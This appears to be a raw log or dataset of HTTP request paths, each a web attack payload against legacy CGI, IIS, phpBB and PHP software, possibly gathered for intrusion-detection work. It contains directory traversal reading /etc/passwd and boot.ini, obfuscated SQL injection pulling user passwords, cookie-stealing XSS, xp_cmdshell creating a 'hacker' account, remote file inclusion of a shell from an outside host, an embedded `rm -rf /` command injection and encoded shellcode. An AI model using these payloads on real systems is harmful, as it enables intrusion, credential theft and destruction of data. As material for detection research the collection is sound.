Packet [3]	/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28%2A.mdb%29&dsn=Evil%2Bsamples%2Bfrom%2Bmicrosoft&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB
Packet [4]	/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c%2Bdir
Packet [5]	/cgi-bin/store.cgi?StartID=../etc/%00.html
Packet [6]	/NessusTest41.html
Packet [9]	/nuke71/modules.php?name=Downloads&d_op=TopRated&ratenum=%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&ratetype=x
Packet [10]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20un%69%6f%6e%20sel%65ct%20or%64%28su%62s%74%72ing%28u%73er%5fpa%73s%77or%64%2c%31%36
Packet [11]	/cgi-bin/view-source?../../../../../../../etc/passwd
Packet [13]	/.%22./.%22./winnt/win.ini%20.pl
Packet [14]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75ni%6f%6e%20sel%65%63%74%20o%72%64%28s%75bst%72in%67%28%75s%65r%5fp%61ss%77%6f%72%64
Packet [15]	/defines.php?WEBCHATPATH=http://192.168.137.211/db_mysql.php
Packet [17]	/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr%27%3Bexec%20master..xp_cmdshell%27net%20user%20algo%20hacker%20/add%27%3B--
Packet [19]	/scripts/iisadmin/ism.dll?http/dir
Packet [21]	/forum/index.php?act=Search&nav=lv&CODE=show&searchid=&search_in=topics&result_type=topics&hl=&st=20%27%3B%20EXECUTE%20IMMEDIATE%20%27SEL%27%20%7C%7C%20%27ECT%20US%27%20%7C%7C%20%27ER%27/%2A
Packet [22]	/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts
Packet [24]	/cgi-bin/bbs_forum.cgi?forum=%3Cforum_name%3E&read=../../../../../../etc/passwd
Packet [26]	/scripts/browse.php?value=%20_&dynamic_value=..%5C..%5Cboot.ini%250
Packet [27]	/carbo.dll?icatcommand=..%5C..%5Cwinnt%5Cntbtlog.txt&catalogname=catalog
Packet [29]	/support/common.php?f=0&ForumLang=../../../../../../../etc/resolv.conf
Packet [30]	/cgi-bin/bbs_forum.cgi?forum=%3Cforum_name%3E&read=../../../../../../etc/hosts
Packet [31]	/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
Packet [33]	/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini
Packet [34]	/scripts/iisadmin/bdir.htr??d:%5Cwebs
Packet [35]	/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/hosts
Packet [36]	/cgi-bin/perlshop.cgi%0D
Packet [38]	/cgi-bin/story.pl?next=../../../etc/passwd%00
Packet [39]	/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527
Packet [40]	/cgi-bin/apexec.pl?template=/etc/passwd%25%0000.html
Packet [41]	/cgi-bin/faxsurvey?/bin/cat%20/etc/resolv.conf
Packet [42]	/cgi-bin/echo.bat?&dir%2Bc:%5C
Packet [43]	/cgi-bin/pagelog.cgi?name=../../../../../tmp/archivo.log
Packet [44]	/cgi-bin/search.cgi?letter=..%5C..%5C..%5C..%5Calgo&start=1&perpage=all
Packet [45]	/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
Packet [47]	/cgi-bin/pagelog.cgi?name=../../../../../tmp/archivo.txt
Packet [52]	/filename%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr
Packet [53]	/PHPLibrary-1.5.3/example/lib/stphpbtnimage.php?cfg_dir=http://www.atacante.com/shell.txt?&
Packet [54]	/msadc/Samples/SELECTOR/CodeBrws.asp?source=/../../winnt/Profiles/Administrator/Application%20Data/Microsoft/Outlook%20Express/Mail/inbox.mb
Packet [55]	/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
Packet [57]	/fcgi-bin/echo2.exe?foo=%3CSCRIPT%3Ealert%28document.domain%29%3C/SCRIPT%3E
Packet [60]	/scripts/georgi.asp/..%C1%9C..%C1%9C..%C1%9Carchivo.ext
Packet [61]	/cgi-bin/csSearch.cgi?command=savesetup&setup=%60rm%20-rf%20/%60
Packet [62]	/cgi-bin/GW5/GWWEB.EXE?HELP=../../../
Packet [63]	/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
Packet [64]	/cgi-bin/search/search.cgi?keys=%2A&prc=any&catigory=../../../../../..
Packet [66]	/cgi-bin/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd
Packet [67]	/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75ni%6f%6e%20se%6c%65%63%74%20o%72d%28%73u%62%73%74r%69n%67%28%75%73e%72_pa%73%73%77%6f%72%64
Packet [69]	/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/hosts.allow
Packet [70]	/it/services/help/?show=about&module=%3B%22.passthru%28%22hola%22%29%3B%27
Packet [72]	/carbo.dll?icatcommand=file_to_view&catalogname=catalog%0D
Packet [73]	/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
Packet [74]	/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts
Packet [77]	/path/modules.php?op=modload&name=Wiki&file=index&pagename=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
Packet [79]	/iisadmpwd/aexp2b.htr
Packet [80]	/typo3/typo3/dev/translations.php?ONLY=/etc/httpd/logs/error_log%00%27
Packet [82]	/it/?cmd=%00%04%24%00%10%00%00%04%24%00%10%00%00%04%24%00%00%00%00%5D%21%00%00%00%02%00%00%00%10D%00W%11%00%00%00d5%00%00%00%00d%25%00%00%00%00%00f?MZt%08%00%10%00%00W%3C%01f:PEuZx%01s%0C%01%3Ekernt%08%3EKERNu%7E%04el32t%09%7E%04EL32ud%05%00%00%00%00%04%0E%04%00%00%02%00%00%03%00%00%1E%04%00%00s%02%00%00%03%00%00
Packet [83]	/scripts/database/philboard.mdb
